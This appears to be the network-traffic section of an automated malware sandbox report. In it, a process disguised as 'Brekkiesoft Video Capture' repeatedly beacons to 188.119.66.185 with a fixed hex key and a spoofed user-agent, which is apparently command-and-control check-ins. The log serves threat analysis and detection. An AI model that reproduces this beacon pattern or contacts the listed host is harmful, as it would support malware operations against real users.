                                                                                                                                      Dec 18, 2024 14:00:30.744091034 CET44349860188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:56.844428062 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:56.844880104 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:56.844908953 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:58.823016882 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:58.823131084 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:58.823590040 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:58.823596954 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:58.823714018 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:58.823718071 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:59.849013090 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:59.849325895 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:59.849543095 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:59.849714994 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:59.849734068 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:59.968425035 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:59.968466043 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:59.968837976 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:59.969077110 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:59.969089031 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:01.592046022 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:01.592108011 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:01.592550039 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:01.592555046 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:01.592715979 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:01.592720032 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:02.555613041 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:02.555721045 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:02.555840969 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:02.556169033 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:02.556184053 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:02.672097921 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:02.672163963 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:02.672236919 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:02.672653913 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:02.672669888 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:04.322603941 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:04.322674036 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:04.323219061 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:04.323229074 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:04.325366020 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:04.325371981 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:05.207411051 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:05.207484007 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.207488060 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:05.207659960 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.207791090 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.207807064 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:05.329994917 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.330068111 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:05.330245972 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.330440044 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.330452919 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:07.307466984 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:07.308660030 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:07.309324980 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:07.309331894 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:07.311674118 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:07.311680079 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:08.431828976 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:08.431910992 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.431911945 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:08.431992054 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.432213068 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.432233095 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:08.548495054 CET49967443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.548535109 CET44349967188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:08.548629999 CET49967443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.548872948 CET49967443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.548890114 CET44349967188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:10.190359116 CET44349967188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:10.190419912 CET49967443192.168.2.7188.119.66.185
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 13:59:10.554888964 CET | 64343 | 53 | 192.168.2.7 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 13:59:10.554888964 CET | 192.168.2.7 | 1.1.1.1 | 0x3786 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 13:59:10.694653034 CET | 1.1.1.1 | 192.168.2.7 | 0x3786 | No error (0) | time.windows.com | twc.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                                                                                      • 188.119.66.185
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49795 | 188.119.66.185 | 443 | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:00:02 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:00:03 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:00:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:00:03 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49804 | 188.119.66.185 | 443 | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:00:05 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:00:06 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:00:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:00:06 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49813 | 188.119.66.185 | 443 | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:00:08 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:00:09 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:00:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:00:09 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49819 | 188.119.66.185 | 443 | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:00:11 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:00:11 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:00:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:00:11 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49824 | 188.119.66.185 | 443 | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:00:13 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:00:14 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:00:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:00:14 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.7 | 49832       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:16 UTC | 283               | OUT       | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                        |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                        |                   |           | Host: 188.119.66.185
2024-12-18 13:00:17 UTC | 200               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx/1.18.0 (Ubuntu)
                        |                   |           | Date: Wed, 18 Dec 2024 13:00:17 GMT
                        |                   |           | Content-Type: text/html; charset=UTF-8
                        |                   |           | Transfer-Encoding: chunked
                        |                   |           | Connection: close
                        |                   |           | X-Powered-By: PHP/7.4.33
2024-12-18 13:00:17 UTC | 24                | IN        | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                        |                   |           | Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.7 | 49838       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:19 UTC | 283               | OUT       | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                        |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                        |                   |           | Host: 188.119.66.185
2024-12-18 13:00:19 UTC | 200               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx/1.18.0 (Ubuntu)
                        |                   |           | Date: Wed, 18 Dec 2024 13:00:19 GMT
                        |                   |           | Content-Type: text/html; charset=UTF-8
                        |                   |           | Transfer-Encoding: chunked
                        |                   |           | Connection: close
                        |                   |           | X-Powered-By: PHP/7.4.33
2024-12-18 13:00:19 UTC | 24                | IN        | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                        |                   |           | Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.7 | 49843       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:21 UTC | 283               | OUT       | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                        |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                        |                   |           | Host: 188.119.66.185
2024-12-18 13:00:22 UTC | 200               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx/1.18.0 (Ubuntu)
                        |                   |           | Date: Wed, 18 Dec 2024 13:00:22 GMT
                        |                   |           | Content-Type: text/html; charset=UTF-8
                        |                   |           | Transfer-Encoding: chunked
                        |                   |           | Connection: close
                        |                   |           | X-Powered-By: PHP/7.4.33
2024-12-18 13:00:22 UTC | 24                | IN        | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                        |                   |           | Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
8          | 192.168.2.7 | 49848       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:24 UTC | 283               | OUT       | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                        |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                        |                   |           | Host: 188.119.66.185
2024-12-18 13:00:25 UTC | 200               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx/1.18.0 (Ubuntu)
                        |                   |           | Date: Wed, 18 Dec 2024 13:00:25 GMT
                        |                   |           | Content-Type: text/html; charset=UTF-8
                        |                   |           | Transfer-Encoding: chunked
                        |                   |           | Connection: close
                        |                   |           | X-Powered-By: PHP/7.4.33
2024-12-18 13:00:25 UTC | 24                | IN        | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                        |                   |           | Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
9          | 192.168.2.7 | 49853       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:26 UTC | 283               | OUT       | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                        |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                        |                   |           | Host: 188.119.66.185
2024-12-18 13:00:27 UTC | 200               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx/1.18.0 (Ubuntu)
                        |                   |           | Date: Wed, 18 Dec 2024 13:00:27 GMT
                        |                   |           | Content-Type: text/html; charset=UTF-8
                        |                   |           | Transfer-Encoding: chunked
                        |                   |           | Connection: close
                        |                   |           | X-Powered-By: PHP/7.4.33
2024-12-18 13:00:27 UTC | 24                | IN        | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                        |                   |           | Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
10         | 192.168.2.7 | 49860       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:29 UTC | 283               | OUT       | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                        |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                        |                   |           | Host: 188.119.66.185
2024-12-18 13:00:30 UTC | 200               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx/1.18.0 (Ubuntu)
                        |                   |           | Date: Wed, 18 Dec 2024 13:00:30 GMT
                        |                   |           | Content-Type: text/html; charset=UTF-8
                        |                   |           | Transfer-Encoding: chunked
                        |                   |           | Connection: close
                        |                   |           | X-Powered-By: PHP/7.4.33
2024-12-18 13:00:30 UTC | 24                | IN        | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                        |                   |           | Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
11         | 192.168.2.7 | 49868       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:32 UTC | 283               | OUT       | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                        |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                        |                   |           | Host: 188.119.66.185
2024-12-18 13:00:34 UTC | 200               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx/1.18.0 (Ubuntu)
                        |                   |           | Date: Wed, 18 Dec 2024 13:00:33 GMT
                        |                   |           | Content-Type: text/html; charset=UTF-8
                        |                   |           | Transfer-Encoding: chunked
                        |                   |           | Connection: close
                        |                   |           | X-Powered-By: PHP/7.4.33
2024-12-18 13:00:34 UTC | 24                | IN        | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                        |                   |           | Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
12         | 192.168.2.7 | 49875       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:35 UTC | 283               | OUT       | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                        |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                        |                   |           | Host: 188.119.66.185
2024-12-18 13:00:36 UTC | 200               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx/1.18.0 (Ubuntu)
                        |                   |           | Date: Wed, 18 Dec 2024 13:00:36 GMT
                        |                   |           | Content-Type: text/html; charset=UTF-8
                        |                   |           | Transfer-Encoding: chunked
                        |                   |           | Connection: close
                        |                   |           | X-Powered-By: PHP/7.4.33
2024-12-18 13:00:36 UTC | 24                | IN        | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                        |                   |           | Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
13         | 192.168.2.7 | 49885       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:38 UTC | 283               | OUT       | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                        |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                        |                   |           | Host: 188.119.66.185
2024-12-18 13:00:39 UTC | 200               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx/1.18.0 (Ubuntu)
                        |                   |           | Date: Wed, 18 Dec 2024 13:00:39 GMT
                        |                   |           | Content-Type: text/html; charset=UTF-8
                        |                   |           | Transfer-Encoding: chunked
                        |                   |           | Connection: close
                        |                   |           | X-Powered-By: PHP/7.4.33
2024-12-18 13:00:39 UTC | 24                | IN        | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                        |                   |           | Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
14         | 192.168.2.7 | 49891       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:40 UTC | 283               | OUT       | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                        |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                        |                   |           | Host: 188.119.66.185
2024-12-18 13:00:41 UTC | 200               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx/1.18.0 (Ubuntu)
                        |                   |           | Date: Wed, 18 Dec 2024 13:00:41 GMT
                        |                   |           | Content-Type: text/html; charset=UTF-8
                        |                   |           | Transfer-Encoding: chunked
                        |                   |           | Connection: close
                        |                   |           | X-Powered-By: PHP/7.4.33
2024-12-18 13:00:41 UTC | 24                | IN        | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                        |                   |           | Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
15         | 192.168.2.7 | 49897       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:43 UTC | 283               | OUT       | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                        |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                        |                   |           | Host: 188.119.66.185
2024-12-18 13:00:44 UTC | 200               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx/1.18.0 (Ubuntu)
                        |                   |           | Date: Wed, 18 Dec 2024 13:00:43 GMT
                        |                   |           | Content-Type: text/html; charset=UTF-8
                        |                   |           | Transfer-Encoding: chunked
                        |                   |           | Connection: close
                        |                   |           | X-Powered-By: PHP/7.4.33
2024-12-18 13:00:44 UTC | 24                | IN        | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                        |                   |           | Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
16         | 192.168.2.7 | 49903       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:45 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:00:46 UTC | 200 | IN  | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:00:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:00:46 UTC | 24  | IN  | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
